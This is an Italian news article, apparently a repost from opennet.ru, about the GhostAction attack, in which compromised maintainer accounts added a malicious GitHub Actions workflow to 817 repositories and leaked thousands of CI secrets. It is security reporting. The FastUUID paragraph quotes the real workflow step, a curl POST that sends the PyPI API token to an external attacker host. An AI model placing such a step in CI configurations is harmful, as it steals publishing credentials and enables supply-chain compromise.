Durante l'attacco GhostAction sono stati compromessi 817 repository su GitHub

I ricercatori di GitGuardian hanno identificato un attacco massiccio agli utenti di GitHub, attraverso il quale è stato preso il controllo di 327 account e inserito un handler malevolo nel GitHub Action in 817 repository. L'attacco ha portato alla perdita di 3325 segreti, utilizzati nei sistemi di integrazione continua e trasmessi attraverso variabili ambientali, inclusi i token di accesso per PyPI, GitHub, NPM, DockerHub e vari servizi di storage cloud.

Durante l'attacco GhostAction sono stati compromessi 817 repository su GitHub

GitHub Actions consente agli sviluppatori di codice di allegare gestori per automatizzare varie operazioni su GitHub. Ad esempio, è possibile utilizzare GitHub Actions per eseguire controlli e test specifici quando si effettuano delle commit o automatizzare la gestione di nuove Issues. Un gestore malevolo si stava diffondendo con il nome «Github Actions Security» e includeva nella sezione «run» il comando «curl», che inviava il contenuto delle variabili d'ambiente a un host esterno durante l'esecuzione dei task nell'ambiente di integrazione continua. Il commit malevolo veniva aggiunto da account di manutentori di progetti, che probabilmente erano stati hackerati o erano caduti vittima di phishing.

Un attacco è stato rilevato dopo l'analisi di attività anomale legate al pacchetto FastUUID, che fornisce un'interfaccia Python sopra la libreria Rust UUID. Il pacchetto FastUUID, che ha registrato quasi 1,2 milioni di download nell'ultima settimana, è utilizzato come dipendenza in un popolare progetto LiteLLM, che conta oltre 5 milioni di download a settimana su PyPI. L'analisi delle modifiche nel repository di FastUUID ha rivelato che il 2 settembre il maintainer del progetto ha aggiunto un commit con un nuovo gestore di Github Action, contenente codice per inviare un token al repository PyPI su un host esterno. — name: Github Actions Security run: | curl -s -X POST -d 'PYPI_API_TOKEN=${{ secrets.PYPI_API_TOKEN }}' https://bold-dhawan.45-139-104-115.plesk.page

Il problema è stato identificato prima che i malintenzionati potessero sfruttare il token intercettato: non sono state registrate pubblicazioni di modifiche dannose o versioni modificate del pacchetto su PyPI per FastUUID. Sostituzioni simili di Github Action sono state individuate in altri 816 repository, ai proprietari dei quali, così come all'amministrazione di PyPI, GitHub, NPM e DockerHub, sono state inviate comunicazioni. A ieri sera, i commit dannosi erano stati annullati in circa 100 repository. Attualmente, in cerca su GitHub, si determinano 671 commit con Github Action dannoso.

Fonte: opennet.ru

Acquista hosting affidabile per siti web con protezione DDoS, VPS VDS server 🔥 Acquista hosting affidabile per siti web con protezione DDoS, VPS VDS server | ProHoster